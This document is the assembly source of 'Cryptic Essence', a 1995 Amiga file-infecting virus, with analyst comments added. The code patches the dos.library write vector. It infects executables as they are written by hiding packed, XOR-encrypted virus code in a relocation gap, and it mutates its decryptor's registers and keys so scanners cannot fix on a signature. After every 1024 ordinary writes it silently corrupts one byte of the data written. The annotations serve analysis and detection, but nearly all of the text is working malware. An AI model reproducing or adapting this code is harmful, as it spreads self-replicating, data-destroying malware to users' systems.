-----BEGIN PGP SIGNED MESSAGE-----
******************************************************************
* *
* Cryptic Essence (c) 1995 By Evil Jesus *
* *
* the world is fucked and so am i maybe it's the other way round *
* *
******************************************************************
* note: some oddities in the code are due to PhxAss's difficulty calculating
* the right values in label (+-) label operations.
OPT !
MACHINE 68000
XDEF _write_link
XDEF _debug_ce
XDEF _check_vir
XDEF _comp_size
XDEF _nocomp_size
XDEF _vir_size
XDEF _linkspace
XDEF _relochole
XDEF _maxadr
XDEF _agression
XDEF _polywait
include "exec/types.i"
include "exec/funcdef.i"
include "exec/libraries.i"
include "exec/exec_lib.i"
include "exec/memory.i"
; Tunable constants. Each one is also published as a longword in the XDEF'd
; table further down (_linkspace, _relochole, _maxadr, _agression, _polywait).
;
; LINKSPACE: number of bytes at the start of the first code hunk that infect
; saves to linksafe before writing the entry stub; 6 bytes matches the longer
; stub form (NOP word + JMP opcode word + displacement word).
LINKSPACE = 6 ; space need for link vector in start of file
; RELOCHOLE: size in bytes of the region of the code hunk that gets replaced.
; find_hole requires a gap of at least RELOCHOLE+4 bytes between relocation
; offsets, and the copy loops move it as RELOCHOLE/4 longwords.
RELOCHOLE = 9216 ; relocation hole need for viruscode (div by 4)
; MAXADR: find_hole rejects the file as soon as a sorted relocation offset
; exceeds this value. Presumably chosen so that the 16-bit PC-relative
; displacement written by infect stays positive -- confirm.
MAXADR = 32766 ; maximum offset for hole
; AGRESSION: reload value of write_wait. After this many pass-through calls the
; next one goes out with one byte of the buffer inverted (see _write_link).
AGRESSION = 1024 ; how often to corrupt write calls
; POLYWAIT: reload value of poly_link. After this many infections with the
; short entry stub the next one gets the NOP-prefixed form (see infect).
POLYWAIT = 50 ; how often use long link
; for debugging infector
; a0 dosbase
;
; Reads the longword at dosbase-46, i.e. the address operand of the jump-table
; slot at offset -48 (the slot that run_code later overwrites), and stores it
; in write_old. Nothing is patched here; the routine only gives _write_link an
; original routine to chain to. Presumably called from an external test
; program, given that it is exported with XDEF -- confirm.
_debug_ce move.l -48+2(a0),write_old
rts
; Returns in d0 the current value of write_infect, the counter that infect
; increments once per successful infection.
_check_vir move.l write_infect,d0
rts
; Exported read-only longwords: sizes computed from the section labels and
; copies of the tunable constants, so that code linked against this object can
; read them without the include file.
; comp_e-comp_s     : the part that is packed together with the saved hole
; nocomp_e-nocomp_s : the header (decryptor + unpack stub) stored unpacked
; vir_e-vir_s       : both parts together
_comp_size dc.l comp_e-comp_s
_nocomp_size dc.l nocomp_e-nocomp_s
_vir_size dc.l vir_e-vir_s
_linkspace dc.l LINKSPACE
_relochole dc.l RELOCHOLE
_maxadr dc.l MAXADR
_agression dc.l AGRESSION
_polywait dc.l POLYWAIT
; longword-align what follows; the copy loops move this code 4 bytes at a time
cnop 0,4
vir_s:
comp_s:
; *******************************************************************
; dos write function link (no code before this!)
; d1 file
; d2 buffer
; d3 length
;
; Replacement for the dos.library write vector. run_code copies the block that
; starts at comp_s and stores the address of that copy in the vector, which is
; why this routine has to be the first code after the label.
;
; Every call takes one of three paths:
;   1. find_hole accepts the buffer and infect succeeds: the original routine
;      is called with the modified buffer, then fix_infect runs.
;   2. find_hole accepts the buffer but infect fails: fix_infect runs and the
;      routine returns d0 = 0; the original write is NOT called on this path.
;   3. find_hole rejects the buffer: the call is passed through unchanged,
;      except that after AGRESSION such calls the next one has the byte at
;      buffer + length/2 inverted while the original routine runs.
;
; Analyst note: in path 3 the byte is inverted back after the call, so the
; caller's memory looks untouched while the data handed to the original write
; routine differs by one byte. Comparing a file against the buffer it was
; written from is what exposes this, not inspecting the buffer.
;
; Register use inside: a4 = base of the variable block (label b),
; a5 = original write routine (write_old), a3 = frame pointer from link.
_write_link movem.l d2-d7/a2-a6,-(sp)
link a3,#-12
lea b,a4
; NOTE(review): link reserves 12 bytes below a3, but d1-d3 are stored at (a3)
; upward, i.e. over the a3 value pushed by link and the d2/d3 slots of the
; movem above. a3 is reloaded by the final movem at .exit.
movem.l d1-d3,(a3)
move.l write_old-b(a4),a5
add.l #1,write_count-b(a4)
; hand the caller's buffer and length to the executable check
move.l d2,a0
move.l d3,d0
bsr find_hole
tst.l d0
beq .normal
bsr infect
tst.l d0
beq .nosuccess
movem.l (a3),d1-d3 ; save virus and rest of data
jsr (a5)
; fix_infect preserves every register, so d0 still holds whatever came out of
; the code above (the original routine's result, or 0 from a failed infect)
.nosuccess bsr fix_infect ; remember to save d0
bra .exit
.normal movem.l (a3),d1-d3
; countdown to the next corrupted write
subq.w #1,write_wait-b(a4)
bpl .write
move.w #AGRESSION,write_wait-b(a4)
add.l #1,write_err-b(a4)
; a2 = buffer + length/2
move.l d2,a2
move.l d3,d0
lsr.l #1,d0
add.l d0,a2
; invert that byte, call the original routine, invert it back
not.b (a2)
jsr (a5)
not.b (a2)
bra .exit
.write jsr (a5)
.exit unlk a3
movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; search reloc hole from data
; a0 mem
; d0 size
; d0 success
;
; Decides whether the buffer at a0 (d0 bytes) starts with a load file whose
; first code hunk is completely inside the buffer and contains a run of at
; least RELOCHOLE+4 bytes that no relocation entry points into.
; On success (d0 = 1) two variables are set:
;   hunk_code = address of the first hunk's data inside the buffer
;   hunk_hole = address inside that hunk where the RELOCHOLE-byte region starts
; On failure d0 = 0. Expects a4 = base of the variable block (set by the
; caller). Uses a temporary AllocVec buffer for the sorted offsets and frees it
; before returning.
;
; Analyst note: the rejection tests below double as a list of files this code
; leaves alone: buffers smaller than RELOCHOLE, odd buffer addresses, files
; whose first hunk is not a code hunk, files with resident-tag or RTS words at
; offset 2 or 4 of the code, and code hunks that do not end inside the buffer.
find_hole movem.l d2-d7/a2-a6,-(sp)
; d7 = temporary buffer pointer, 0 while nothing is allocated
moveq #0,d7
cmp.l #RELOCHOLE,d0 ; no point checking if smaller
blo .notexe
move.l a0,d1
btst #0,d1 ; aligment?
bne .notexe
; longword 0 must be the load-file header id, longword 1 must be zero
cmp.l #$3f3,(a0) ; exe?
bne .notexe
tst.l 4(a0)
bne .notexe
; skip the header: 28 bytes of fixed fields plus 4 bytes per hunk-table entry
move.l 8(a0),d1 ; hunk count
lsl.l #2,d1
lea 28(a0,d1.l),a1 ; first hunk
move.l a1,hunk_code-b(a4)
; -8(a1) is the hunk id, -4(a1) the hunk length in longwords
cmp.l #$3e9,-8(a1) ; code hunk?
bne .notexe
; $4afc / $4e75 at offset 2 or 4 of the code: treated as "not a program"
cmp.w #$4afc,2(a1) ; exclude libraries & devices
beq .notexe ; (rude check)
cmp.w #$4e75,2(a1)
beq .notexe
cmp.w #$4e75,4(a1)
beq .notexe
cmp.w #$4afc,4(a1)
beq .notexe
; d1 = code hunk size in bytes
move.l -4(a1),d1
lsl.l #2,d1
cmp.l #RELOCHOLE,d1 ; enough data in codehunk
blo .notexe
lea (a1,d1.l),a2 ; reloc-32 start
lea -4(a0,d0.l),a3 ; data end
; the longword that follows the code hunk must still be inside the buffer
cmp.l a3,a2
bhi .notexe
cmp.l #$3ec,(a2) ; reloc hunk?
bne .noreloc
; walk the relocation blocks (count, hunk number, count offsets) until a zero
; count, summing the counts in d2; every step is bounds-checked against a3
moveq #0,d2 ; calculate reloc count
lea 4(a2),a0
.calc cmp.l a3,a0
bhi .notexe
move.l (a0),d0
beq .calcdone
add.l d0,d2
lsl.l #2,d0
lea 8(a0,d0.l),a0
bra .calc
; allocate 4 bytes per offset; d1 = 0 is passed as the memory requirements
.calcdone move.l d2,d0
lsl.l #2,d0
moveq #0,d1
; a6 = exec library base, read from address 4
move.l $4.w,a6
CALLLIB _LVOAllocVec
move.l d0,d7
beq .notexe
; gather all offsets into the temporary buffer and sort them
lea 4(a2),a0 ; sort hunk
move.l d0,a1
move.l d2,d0
bsr _sort_hunk
move.l d2,d0 ; search reloc hole
move.l d7,a0
; the lowest offset must not fall inside the LINKSPACE bytes at the hunk start
move.l (a0),d2
cmp.l #LINKSPACE,d2
blo .notexe
; d1 = previous offset (starts at 2), d2 = current offset, d0 = entries left
moveq #2,d1
.loop move.l (a0)+,d2
cmp.l #MAXADR,d2
bhi .notexe
move.l d2,d3
sub.l d1,d2
; gap between two neighbouring offsets large enough?
cmp.l #RELOCHOLE+4,d2
bhs .hit
move.l d3,d1
subq.l #1,d0
bne .loop
; no gap between entries: try the space from the last offset to the hunk end
move.l hunk_code-b(a4),a0
move.l -4(a0),d2
lsl.l #2,d2
sub.l d1,d2
cmp.l #RELOCHOLE+4,d2
bhs .hit
bra .notexe
; hole starts 4 bytes after the offset that precedes the gap
.hit move.l hunk_code-b(a4),a0
add.l d1,a0
add.l #4,a0
move.l a0,hunk_hole-b(a4)
moveq #1,d6
bra .exit
; no relocation hunk after the code: hole starts right after the entry stub
.noreloc move.l hunk_code-b(a4),a0
add.l #LINKSPACE,a0
move.l a0,hunk_hole-b(a4)
moveq #1,d6
bra .exit
.notexe moveq #0,d6
; common exit: release the temporary buffer if one was allocated
.exit tst.l d7
beq .no_free
move.l d7,a1
CALLLIB _LVOFreeVec
.no_free move.l d6,d0
movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; compress hole and virus together and prepare memory
; d0 success
;
; Rewrites the caller's buffer in place, using hunk_code / hunk_hole as set by
; find_hole and a4 = base of the variable block. Steps:
;   1. allocate a work buffer (AllocVec), pointer kept in hunk_comp
;   2. save the first LINKSPACE bytes of the code hunk to linksafe and copy
;      the RELOCHOLE bytes of the hole plus comp_s..comp_e into the buffer
;   3. pack that copy; give up unless packed data + header + 8 <= RELOCHOLE
;   4. write header (nocomp_s..nocomp_e) and packed data into the hole
;   5. write the entry stub at the start of the code hunk
;   6. encrypt part of the hole and patch the decryptor in the header to match
; Returns d0 = 1 on success, 0 on failure. The work buffer is not freed here;
; fix_infect does that.
;
; Analyst notes:
; - The entry stub has exactly two forms: $4efa + displacement, or
;   $4e71, $4efa + displacement. The second form is used once after every
;   POLYWAIT infections.
; - Step 6 changes only immediates, one add/sub opcode and register-number
;   bit fields of the decryptor; the number, order and length of its
;   instructions stay as assembled at nocomp_s. A pattern that masks out those
;   fields therefore still matches every generation produced by this routine.
; - Because the host's own bytes are stored (packed) inside the hole, a repair
;   tool needs both the saved hole and the LINKSPACE bytes to restore a file.
infect movem.l d2-d7/a2-a6,-(sp)
* we need to allocate two buffers due compressor implementation
; size = (RELOCHOLE + 128 + size of comp part) * 2, requirements d1 = 0
move.l #RELOCHOLE+128,d0
add.l #comp_e-comp_s,d0
lsl.l #1,d0
moveq #0,d1
move.l $4.w,a6
CALLLIB _LVOAllocVec
move.l d0,hunk_comp-b(a4)
beq .nocomp
; run_reloc = hole address - code hunk start, kept as a 16-bit value
move.l hunk_hole-b(a4),d0 ; distance to save
sub.l hunk_code-b(a4),d0
move.w d0,run_reloc-b(a4)
move.l hunk_code-b(a4),a0 ; copy jump vector to save
lea linksafe,a1
move.w #LINKSPACE-1,d0
.loop3 move.b (a0)+,(a1)+
dbf d0,.loop3
move.l hunk_comp-b(a4),a1
move.l hunk_hole-b(a4),a0 ; copy relochole to save
move.w #[RELOCHOLE/4]-1,d0
.loop move.l (a0)+,(a1)+
dbf d0,.loop
; a1 now points just past the saved hole; append comp_s..comp_e there
lea comp_s,a0 ; copy virus to save
move.w #comp_e-comp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop2 move.l (a0)+,(a1)+
dbf d0,.loop2
; source = work buffer, target = directly behind the source data
move.l hunk_comp-b(a4),a0 ; pack data
move.l #RELOCHOLE,d0
add.l #comp_e-comp_s,d0
move.l a0,a1
add.l d0,a1
bsr pack
tst.l d0
beq .nocomp
; the first longword of the pack output is used as the packed length
move.l hunk_comp-b(a4),a0 ; check if packed enough
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
move.l (a0),d0
add.l #nocomp_e-nocomp_s,d0
add.l #8,d0
cmp.l #RELOCHOLE,d0
bls .compok
; too big: zero that longword, which fix_infect tests before restoring
clr.l (a0)
bra .nocomp
.compok
* header/data copy
lea nocomp_s,a0
move.l hunk_hole-b(a4),a1
move.w #nocomp_e-nocomp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop4 move.l (a0)+,(a1)+
dbf d0,.loop4
; packed block (length longword included) goes directly behind the header
move.l hunk_comp-b(a4),a0 ; packed data
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
move.l (a0),d0
add.l #4,d0
lsr.w #2,d0
.loop5 move.l (a0)+,(a1)+
dbf d0,.loop5
* jump vector (including surprise for killers who don't examine code) *
; displacement is relative to the address of the displacement word itself,
; hence run_reloc-2 for the short form and run_reloc-4 behind the extra word
move.l hunk_code-b(a4),a2
move.w run_reloc-b(a4),d0
sub.w #2,d0
sub.w #1,poly_link-b(a4)
bpl .giggle
move.w #POLYWAIT,poly_link-b(a4)
sub.w #2,d0
move.w #$4e71,(a2)+
.giggle move.w #$4efa,(a2)+ ; add jmp to start of hunk
move.w d0,(a2)
* the real magic begins... *
; three hardware register reads supply the per-infection values
move.w $dff00a,d1 ; 'random' key
move.w $dff006,d2 ; 'random' add
move.b $bfe601,d3 ; add/sub mode
; a0 = first word to encrypt (the copy of crypt_s inside the hole)
move.l hunk_hole-b(a4),a0
add.w #crypt_s-nocomp_s,a0
move.w #RELOCHOLE/2,d0
sub.w #crypt_s-nocomp_s,d0
lsr.w #1,d0
move.w d0,d4 ; crypt size
; d5 = running key: XORed into each word, then stepped by +d2 or -d2
; depending on the sign of the mode byte in d3
move.w d1,d5
.loop6 eor.w d5,(a0)+ ; crypt data
tst.b d3
bpl .addmode
sub.w d2,d5
bra .more
.addmode add.w d2,d5
.more dbf d0,.loop6
; patch the header copy so its decryptor uses the same key, count and step
move.l hunk_hole-b(a4),a0
move.w d1,sp00-nocomp_s+2(a0) ; put key
move.w d4,sp02-nocomp_s+2(a0) ; put size
move.w #$0640,sp05-nocomp_s(a0) ; opcode: add
tst.b d3
bpl .putadd
move.w #$0440,sp05-nocomp_s(a0) ; opcode: sub
.putadd move.w d2,sp05-nocomp_s+2(a0) ; put value
* Simple Polymorph Engine (SpE) *
; Register fields that get rewritten, per instruction of the decryptor:
; add.w #$0000,dx ; %0000000000000xxx
; sub.w #$0000,dx ; %0000000000000xxx
; dbf dx,label ; %0000000000000xxx
; move.w #$0000,dx ; %0000xxx000000000
; eor.w dx,(ay)+ ; %0000xxx000000yyy
; lea label(pc),ay ; %0000yyy000000000
; d3 = shift that moves a register number into bits 9-11
moveq #9,d3
; address register: poly_a cycles 0..5
move.w poly_a-b(a4),d0
add.w #1,d0
cmp.w #5,d0
bls .adrok
moveq #0,d0
.adrok move.w d0,poly_a-b(a4)
move.w #%1111111111111000,d2
and.w d2,sp04-nocomp_s(a0) ; eor
or.w d0,sp04-nocomp_s(a0)
move.w #%1111000111111111,d2
lsl.w d3,d0
and.w d2,sp03-nocomp_s(a0) ; lea
or.w d0,sp03-nocomp_s(a0)
; data registers: poly_d cycles 0..7 for the key register (d0),
; the loop counter uses the next number modulo 8 (d1)
move.w poly_d-b(a4),d0
add.w #1,d0
cmp.w #7,d0
bls .datok
moveq #0,d0
.datok move.w d0,poly_d-b(a4)
move.w d0,d1
add.w #1,d1
cmp.w #7,d1
bls .datok2
moveq #0,d1
.datok2: move.w #%1111111111111000,d2
and.w d2,sp05-nocomp_s(a0) ; add/sub
or.w d0,sp05-nocomp_s(a0)
and.w d2,sp06-nocomp_s(a0) ; dbf
or.w d1,sp06-nocomp_s(a0)
move.w #%1111000111111111,d2
lsl.w d3,d0
lsl.w d3,d1
and.w d2,sp00-nocomp_s(a0) ; move
or.w d0,sp00-nocomp_s(a0)
and.w d2,sp04-nocomp_s(a0) ; eor
or.w d0,sp04-nocomp_s(a0)
and.w d2,sp02-nocomp_s(a0) ; move
or.w d1,sp02-nocomp_s(a0)
* magic ends, now it is harder to select scan string
; .skip is not referenced anywhere in this listing
.skip
add.l #1,write_infect-b(a4)
moveq #1,d0
bra .exit
.nocomp moveq #0,d0
.exit: movem.l (sp)+,d2-d7/a2-a6
rts
; *******************************************************************
; repair possible damage done by infect and free everything
; (note: all registers must be saved)
;
; Called by _write_link after infect, whether or not infect succeeded.
; Saves and restores d0-d7/a0-a6, so the caller's d0 survives the call.
; Does nothing but clear hunk_comp when no work buffer is allocated.
; Otherwise it tests the longword at hunk_comp + RELOCHOLE + size of the comp
; part (the packed-length slot that infect zeroes when it gives up): zero means
; "only free the buffer", non-zero means "run the two copy loops first".
; Expects a4 = base of the variable block.
fix_infect movem.l d0-d7/a0-a6,-(sp)
move.l hunk_comp-b(a4),d0
beq .no_free
move.l d0,a0 ; check if memory file was modified
add.l #RELOCHOLE,a0
add.l #comp_e-comp_s,a0
tst.l (a0)
beq .free_only
; NOTE(review): as written the source pointer a0 is hunk_hole and the
; destination a1 is the work buffer, so this loop copies RELOCHOLE bytes from
; the caller's buffer into the work buffer, which is the opposite of what the
; comment on the next line says -- confirm against a trace.
move.l d0,a1 ; copy relochole back
move.l hunk_hole-b(a4),a0
move.w #[RELOCHOLE/4]-1,d1
.loop move.l (a0)+,(a1)+
dbf d1,.loop
; here the direction is linksafe -> start of the code hunk
lea linksafe,a0 ; copy jump vector back
move.l hunk_code-b(a4),a1
move.w #LINKSPACE-1,d1
.loop3 move.b (a0)+,(a1)+
dbf d1,.loop3
; release the work buffer allocated by infect
.free_only move.l d0,a1
move.l $4.w,a6
CALLLIB _LVOFreeVec
.no_free clr.l hunk_comp-b(a4)
movem.l (sp)+,d0-d7/a0-a6
rts
; *******************************************************************
; repair the running file and install virus to memory
; a3 header adr
; a5 start of this memory
; d5 size of this memory
; a6 exec
;
; Runs when an infected program is started, from the unpacked copy that
; crypt_s jumps into. The register set pushed by the header at nocomp_s is
; still on the stack and is popped just before the final jump.
; Sequence:
;   1. Forbid, compute the host's code-hunk start (a3 - run_reloc) and patch
;      it into the operand of the jmp at linkjmp
;   2. open dos.library with minimum version 36; on failure skip to .repair
;   3. read the address operand of the jump-table slot at offset -48 and keep
;      it in write_old; install only if it lies in $00f00000..$00ffffff
;   4. AllocMem vir_e-vir_s bytes, copy comp part and header into it, and
;      store the address of that copy straight into the slot's operand
;   5. .repair: put the saved LINKSPACE bytes and the saved hole back into the
;      host's code, flush caches where the call exists, free the unpack
;      buffer, Permit, restore registers and jump to the host
;
; Analyst notes:
; - The install test in step 3 is also the only "already resident" test: once
;   the slot points outside that address range (to this code or to any other
;   patch), step 4 is skipped. A write vector whose operand points outside
;   that range is therefore the in-memory indicator to look for.
; - The slot is written directly; no library call is used to replace it.
; - With a dos.library older than version 36, step 2 fails and the host is
;   repaired and run without anything being installed.
run_code
CALLLIB _LVOForbid
lea b,a4
move.l a3,a0 ; program run adr
sub.w run_reloc-b(a4),a0
move.l a0,linkjmp-b+2(a4)
lea dosname,a1
moveq #36,d0
CALLLIB _LVOOpenLibrary
tst.l d0
beq .repair
; the base pointer stays in a2; the library is closed again right away
move.l d0,a2
move.l d0,a1
CALLLIB _LVOCloseLibrary
move.l -48+2(a2),d0
move.l d0,write_old-b(a4)
cmp.l #$00f00000,d0 ; rekicked won't be active...
blo .repair
cmp.l #$00ffffff,d0
bhi .repair
move.l #vir_e-vir_s,d0 ; alloc mem for both parts
move.l #0,d1
CALLLIB _LVOAllocMem
move.l d0,d7
beq .repair
; the resident copy starts with no work buffer
clr.l hunk_comp-b(a4)
lea comp_s,a0 ; copy compcode
move.l d7,a1
move.w #comp_e-comp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop move.l (a0)+,(a1)+
dbf d0,.loop
; the header is taken from the host's memory at a3, not from the unpacked copy
move.l a3,a0 ; copy nocompcode (header)
move.w #nocomp_e-nocomp_s,d0
lsr.w #2,d0
subq.w #1,d0
.loop2 move.l (a0)+,(a1)+
dbf d0,.loop2
; d7 = address of the copied comp_s, i.e. of _write_link in the new block
move.l d7,-48+2(a2) ; activate CE
.repair lea linksafe-b(a4),a0 ; link back
move.l linkjmp-b+2(a4),a1
moveq #LINKSPACE-1,d1
.loop3 move.b (a0)+,(a1)+
dbf d1,.loop3
; the first RELOCHOLE bytes of the unpack buffer are the host's original hole
move.l a5,a0 ; relochole back
move.l a3,a1
move.w #[RELOCHOLE/4]-1,d1
.loop4 move.l (a0)+,(a1)+
dbf d1,.loop4
; call CacheClearU only if its jump-table slot starts with the $4ef9 opcode
cmp.w #$4ef9,_LVOCacheClearU(a6)
bne .kick13
jsr _LVOCacheClearU(a6)
; a5/d5 describe the buffer this code was entered in (see header comment);
; the instructions after the FreeMem still execute from it
.kick13 move.l a5,a1
move.l d5,d0
CALLLIB _LVOFreeMem
CALLLIB _LVOPermit
movem.l (sp)+,d0-d7/a0-a6 ; crash is possible...
; operand is a placeholder, overwritten at the top of run_code
linkjmp jmp $43453130
; *******************************************************************
; sort data
; a0 source longwords
; a1 target area
; d0 count
;
; First pass (visible here): flattens the relocation blocks at a0 into the
; target area. Each block is read as: count, one longword that is skipped,
; then count offsets; a zero count ends the list. The caller must have sized
; the target area for the sum of all counts (find_hole does).
; There is no rts in this file after .done: execution continues into the code
; included from lqsort.asm with a0 = target area and d0 = count. That file is
; not part of this listing; presumably it sorts the longwords in place and
; returns to the caller -- confirm.
_sort_hunk
movem.l a1/d0,-(sp)
.next move.l (a0),d0
beq .done
; skip the count and the following longword
add.l #8,a0
.loop move.l (a0)+,(a1)+
subq.l #1,d0
bne .loop
bra .next
; reload the saved pair as a0 = target area, d0 = count
.done movem.l (sp)+,a0/d0
include "lqsort.asm"
EVEN
; *******************************************************************
; compress data
; a0 source
; a1 target
; d0 source size
; d1 target size
; d0 success
;
; The body comes from compressor.asm, which is not part of this listing, so
; the interface above is the author's description only. What the callers in
; this file rely on: d0 = 0 means failure, and the first longword written at
; the target is the length of the packed data that follows it.
pack include "compressor.asm"
*** data ***
; Variable block. Code loads a4 with the address of b and reaches every
; variable as name-b(a4). The block lies between comp_s and comp_e, so it is
; copied and packed together with the code and each resident copy carries its
; own counters.
b:
hunk_code dc.l 0 ; codehunk adr
hunk_hole dc.l 0 ; relochole adr
hunk_comp dc.l 0 ; relochole save & virus
write_old dc.l 0 ; old write function address
write_count dc.l 0 ; write call count (total)
write_err dc.l 0 ; write call count (corrupted)
write_infect dc.l 0 ; write call count (infected)
write_wait dc.w AGRESSION ; corruption wait
poly_link dc.w POLYWAIT ; trap for viruskillers
; register numbers last used for the decryptor (address / data register)
poly_a dc.w 0
poly_d dc.w 0
linksafe blk.b LINKSPACE,0 ; old code in start of hunk
run_reloc dc.w 0 ; distance between hole and codehunk start
*** strings ***
; The text below is not referenced by any instruction in this listing. It is
; part of the packed region, so it is not expected to appear as plain text in
; an infected file -- confirm against a sample.
dc.b "Cryptic Essence, © 1995 Evil Jesus (maximum false positive) "
dc.b "Extra thanks for Vesselin Bontchev for giving valueable "
dc.b "information how to reach maximum damage in essee 'Future "
dc.b "Trends in Virus Writing'"
; library name passed to OpenLibrary in run_code
dosname dc.b "dos.library",0
cnop 0,4
comp_e:
; --- this part cannot be compressed ---
; Header that infect copies to the start of the hole in the host's code hunk.
; The entry stub at the start of the hunk jumps here. Two stages:
;   nocomp_s .. sp09 : decryptor, stored in clear
;   crypt_s ..       : unpack stub, stored encrypted together with what follows
;
; Analyst note: of the instructions labelled sp00..sp09, infect rewrites only
; the immediates at sp00, sp02 and sp05, the add/sub opcode at sp05 and the
; register-number fields of sp00 and sp02..sp06. The movem before sp00, sp01
; and sp07..sp09 are copied as assembled, and the order and length of all
; instructions never change. The constants shown below ($4345, $1234, $3934)
; are template values only.
nocomp_s:
; visible header (SpE coded)
; all registers are saved here and restored by run_code or by .fail
movem.l d0-d7/a0-a6,-(sp)
sp00 move.w #$4345,d0
sp01 move.l $4.w,a6
sp02 move.w #$1234,d1
sp03 lea crypt_s(pc),a0
; XOR one word with the running key, step the key, count down
sp04 eor.w d0,(a0)+
sp05 add.w #$3934,d0 ; add/sub
sp06 dbf d1,sp04
; flush caches after modifying code, if the CacheClearU slot is populated
sp07 cmp.w #$4ef9,_LVOCacheClearU(a6)
sp08 bne crypt_s
sp09 jsr _LVOCacheClearU(a6)
; some killers will decrypt this using header key, solution must be
; found to hide it better... fortunately code can be rewritten easily
; without fear of multiple infections of variants!
crypt_s:
; allocate the unpack buffer: RELOCHOLE + 256 + size of the comp part,
; requirements d1 = 0; the size is kept in d5 for the FreeMem in run_code
move.l #RELOCHOLE+256,d0
add.l #comp_e-comp_s,d0
move.l d0,d5
move.l #0,d1
CALLLIB _LVOAllocMem
tst.l d0
beq .fail
move.l d0,a5
; unpack the data that follows the header into the buffer
lea nocomp_e,a0
move.l d0,a1
bsr depack
cmp.w #$4ef9,_LVOCacheClearU(a6)
bne .kick13
jsr _LVOCacheClearU(a6)
; buffer layout: RELOCHOLE bytes of saved host code, then the comp part;
; continue at run_code inside that unpacked copy with a3 = this header
.kick13 lea nocomp_s,a3
lea RELOCHOLE(a5),a0
add.l #run_code-comp_s,a0
jmp (a0)
; no memory: restore registers and return 20 in d0 without running the host
.fail: movem.l (sp)+,d0-d7/a0-a6
move.l #20,d0
rts
; *******************************************************************
; decompress data
; a0 source
; a1 target
;
; The body comes from decompressor.asm, which is not part of this listing.
; It is assembled into the header because it has to run before anything has
; been unpacked; crypt_s calls it with a0 = nocomp_e and a1 = the new buffer.
depack include "decompressor.asm"
cnop 0,4
; end of the header; in an infected file the packed block written by infect
; starts at the corresponding position
nocomp_e:
; --- compressed data follows ---
vir_e:
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui (Amiga)
iQBFAgUBMFQGSY3j8jX6L7S9AQE9NAF/VwqG1gb2rjJ7+Hpk3UXpWMDoa/L+CgDx
xkgGgpETv/OuqDsOXK/pWmD4XM6q7HFh
=/r5A
-----END PGP SIGNATURE-----